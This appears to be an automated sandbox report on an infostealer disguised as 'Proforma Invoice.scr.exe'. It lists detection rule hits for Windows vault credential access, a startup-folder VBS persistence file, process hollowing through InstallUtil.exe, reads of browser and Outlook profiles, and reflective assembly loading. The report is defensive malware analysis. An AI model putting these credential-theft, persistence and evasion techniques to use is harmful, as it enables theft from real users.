                      Source: 6.2.EncoderFallback.exe.3cf5570.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
                      Source: initial sample | Static PE information: Filename: Proforma Invoice.scr.exe
                      Source: Proforma Invoice.scr.exe | Static file information: Suspicious name
                      Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe | Code function: 6_2_05D36EE0 NtResumeThread, 6_2_05D36EE0
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe | Code function: 6_2_05D35EA8 NtProtectVirtualMemory, 6_2_05D35EA8
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe | Code function: 6_2_05D36ED8 NtResumeThread, 6_2_05D36ED8
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe | Code function: 6_2_05D35EA0 NtProtectVirtualMemory, 6_2_05D35EA0
                      Source: Proforma Invoice.scr.exe | Binary or memory string: OriginalFilename vs Proforma Invoice.scr.exe
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2480596735.0000000006360000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Proforma Invoice.scr.exe
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2454133386.00000000029D4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename733a6bb5-19fe-4822-8fda-5eaf140f8bd0.exe4 vs Proforma Invoice.scr.exe
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003578000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Proforma Invoice.scr.exe
                      Source: Proforma Invoice.scr.exe, 00000000.00000000.2255212878.0000000000284000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameAvhywekp.exe2 vs Proforma Invoice.scr.exe
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2454133386.0000000002911000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Proforma Invoice.scr.exe
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2454133386.0000000002911000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAvhywekp.exe2 vs Proforma Invoice.scr.exe
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2454133386.00000000025BD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs Proforma Invoice.scr.exe
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2453582503.00000000008FE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Proforma Invoice.scr.exe
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2479169226.0000000006110000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameEpjjhbuhzzx.dll" vs Proforma Invoice.scr.exe
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameEpjjhbuhzzx.dll" vs Proforma Invoice.scr.exe
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Proforma Invoice.scr.exe
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2463724121.00000000036A9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename733a6bb5-19fe-4822-8fda-5eaf140f8bd0.exe4 vs Proforma Invoice.scr.exe
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003758000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameEpjjhbuhzzx.dll" vs Proforma Invoice.scr.exe
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003A22000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Proforma Invoice.scr.exe
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003633000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Proforma Invoice.scr.exe
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2469463430.00000000059B0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Proforma Invoice.scr.exe
                      Source: Proforma Invoice.scr.exe | Binary or memory string: OriginalFilenameAvhywekp.exe2 vs Proforma Invoice.scr.exe
                      Source: Proforma Invoice.scr.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 0.2.Proforma Invoice.scr.exe.36bf7a0.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 6.2.EncoderFallback.exe.3cf5570.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Proforma Invoice.scr.exe.36bf7a0.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 3.2.InstallUtil.exe.340000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 6.2.EncoderFallback.exe.3cf5570.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: Proforma Invoice.scr.exe, Aqzdppc.cs | Cryptographic APIs: 'CreateDecryptor'
                      Source: EncoderFallback.exe.0.dr, Aqzdppc.cs | Cryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.Proforma Invoice.scr.exe.38513e0.7.raw.unpack, rPpUx8IYtCf2OCkidwJ.cs | Cryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.Proforma Invoice.scr.exe.35e3220.8.raw.unpack, ITaskFolder.cs | Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                      Source: 0.2.Proforma Invoice.scr.exe.35e3220.8.raw.unpack, TaskFolder.cs | Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                      Source: 0.2.Proforma Invoice.scr.exe.35e3220.8.raw.unpack, Task.cs | Task registration methods: 'RegisterChanges', 'CreateTask'
                      Source: 0.2.Proforma Invoice.scr.exe.35e3220.8.raw.unpack, TaskService.cs | Task registration methods: 'CreateFromToken'
                      Source: 0.2.Proforma Invoice.scr.exe.35e3220.8.raw.unpack, TaskPrincipal.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Proforma Invoice.scr.exe.35e3220.8.raw.unpack, User.cs | Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                      Source: 0.2.Proforma Invoice.scr.exe.35e3220.8.raw.unpack, Task.cs | Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.Proforma Invoice.scr.exe.35e3220.8.raw.unpack, TaskFolder.cs | Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.Proforma Invoice.scr.exe.35e3220.8.raw.unpack, TaskSecurity.cs | Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                      Source: 0.2.Proforma Invoice.scr.exe.35e3220.8.raw.unpack, TaskSecurity.cs | Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                      Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winEXE@8/3@4/3
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EncoderFallback.vbs
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Mutant created: NULL
                      Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EncoderFallback.vbs"
                      Source: Proforma Invoice.scr.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: Proforma Invoice.scr.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: Proforma Invoice.scr.exe | ReversingLabs: Detection: 60%
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe | File read: C:\Users\user\Desktop\Proforma Invoice.scr.exe
                      Source: unknown | Process created: C:\Users\user\Desktop\Proforma Invoice.scr.exe "C:\Users\user\Desktop\Proforma Invoice.scr.exe"
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Roaming\EncoderFallback.exe "C:\Users\user\AppData\Roaming\EncoderFallback.exe"
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                      Source: Proforma Invoice.scr.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Proforma Invoice.scr.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003578000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2454133386.0000000002911000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003633000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2469463430.00000000059B0000.00000004.08000000.00040000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2771284089.0000000003C69000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2771284089.0000000003B98000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2753904041.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Proforma Invoice.scr.exe, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003578000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2454133386.0000000002911000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003633000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2469463430.00000000059B0000.00000004.08000000.00040000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2771284089.0000000003C69000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2771284089.0000000003B98000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2753904041.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: Proforma Invoice.scr.exe, 00000000.00000002.2480596735.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003A22000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: Proforma Invoice.scr.exe, 00000000.00000002.2480596735.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003A22000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      Source: 0.2.Proforma Invoice.scr.exe.38513e0.7.raw.unpack, rPpUx8IYtCf2OCkidwJ.cs.Net Code: Type.GetTypeFromHandle(a5LH887NkAJ9KItLhcU.qmHB75aU9A(16777347)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(a5LH887NkAJ9KItLhcU.qmHB75aU9A(16777252)),Type.GetTypeFromHandle(a5LH887NkAJ9KItLhcU.qmHB75aU9A(16777284))})
                      Source: Proforma Invoice.scr.exe, Aqzdppc.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                      Source: EncoderFallback.exe.0.dr, Aqzdppc.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.Proforma Invoice.scr.exe.6360000.12.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 0.2.Proforma Invoice.scr.exe.6360000.12.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 0.2.Proforma Invoice.scr.exe.6360000.12.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 0.2.Proforma Invoice.scr.exe.6360000.12.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
